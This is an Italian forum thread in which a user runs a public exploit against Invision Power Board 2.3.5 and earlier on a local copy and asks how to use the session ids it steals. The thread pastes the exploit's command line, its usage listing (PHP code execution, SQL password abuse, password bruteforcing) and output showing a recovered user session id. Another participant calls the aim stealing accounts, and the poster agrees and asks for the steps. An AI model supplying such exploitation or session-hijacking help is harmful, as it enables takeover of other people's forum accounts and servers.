Chiarimenti user_sid

Stato
Discussione chiusa ad ulteriori risposte.

Eraserhead

Utente Silver
30 Novembre 2008
0
0
0
55
Ciao ragazzi....volevo provi un mio dubbio....

Sto provando in locale un exploit su ipb <-- 2.3.5 ....l'exploit in questione restituisce la sessione admin (admin_sid) se la trova, quindi puoi collegarti se sei fortunato all'acp.....e funge....

il comando è
php /var/www/sql.php -attack 1 -url localhost/IPB/upload/ -uname admin -prefix ibf_
e l'exploit si trova su milw0rm.....

Nel caso in cui con l'account admin non mi loggo nell'acp ma solo nel forum, mi restituisce l'user_sid......cioè la sessione normale da utente....

Ora è in qualche modo sfruttabile questa cosa? Perche non fosse servita a niente avrebbero messo solo l'admin_sid.....
Cambiando la sessione nei cookie non mi pare succede nulla....

Grazie delle eventuali spiegazioni e ciao
 
sydarex ha detto:
Ehm.. Fregare account?

Si bhe....diciamo che immaginavo....

L'admin sid lo metto nella barra degli indirizzi con l'url dell'acp e con l'id dell'utente e si collega...
l'user sid immagino vada messo nei cookie....ma come detto non funge....

Consigli sul procedimento?
 
V1R5 ha detto:
Link all'exploit
(dovrebbe esserci l'usage, credo)

L'exploit è qui
http://milw0rm.org/exploits/6325
L'usage è questo....ma ci sono altri commenti sparsi per un po tutto il codice....

Codice:
Invision Power Board <= 2.3.5 Multiple Vulnerabilities
 ------------------------------------------------------

 About:

 by DarkFig < gmdarkfig (at) gmail (dot) com >
 http://acid-root.new.fr/
 #[email protected]


 Attack(s):

 -attack <int_choice> <params> [options]

  1 - PHP code execution

    -url        IPB url with ending slash

    -uname      targeted username
    -uid        OR the targeted user id (def: 1)

    -prefix     sql table prefix (def: ibf_)
    -acp        admin control panel path (def: admin)


  2 - Insecure SQL password usage

    -ip         your current IP
    -dict       a wordlist file

    -url        IPB url with ending slash
    -uname      a valid member username
    -pwd        the associated password

    -uid        OR  the targeted member id
    -passhash   the passhash cookie value
    -stronghold the stronghold cookie value

    -sqlusr     you can precise the sql user
    -prefix     sql table prefix (def: ibf_)


  3 - Password bruteforcer

    -dict       a wordlist file

    -url        IPB url with ending slash
    -uname      targeted username
    -uid        OR  the targeted user id (def: 1)
    -prefix     sql table prefix (def: ibf_)

    -passhash   OR the passhash value
    -salt       the salt value


  Optional: 

    -proxhost <ip>       if you wanna use a proxy
    -proxauth <usr:pwd>  proxy with authentication

Se lo lancio in locale sull'account member, mi da questo output:

Codice:
 php /var/www/sql.php -attack 1 -url localhost/IPB/upload/ -uname member -prefix ibf_ 

 Invision Power Board <= 2.3.5 Multiple Vulnerabilities
 ------------------------------------------------------

 About:

 by DarkFig < gmdarkfig (at) gmail (dot) com >
 http://acid-root.new.fr/
 #[email protected]


 Attack(s):

 + Using table prefix ibf_
 + Using targeted username member
 + Using default ACP path: admin
 + Removed all out of date admin sessions
 / Trying to get the cookie prefix
 + No cookie prefix set
 / Trying to find an admin session id
 + admin_sid= 
 - No admin session id found
 / Trying to find a user session id
 + user_sid=e560b8a405e994e9f991d3fccce83dcf
 
Stato
Discussione chiusa ad ulteriori risposte.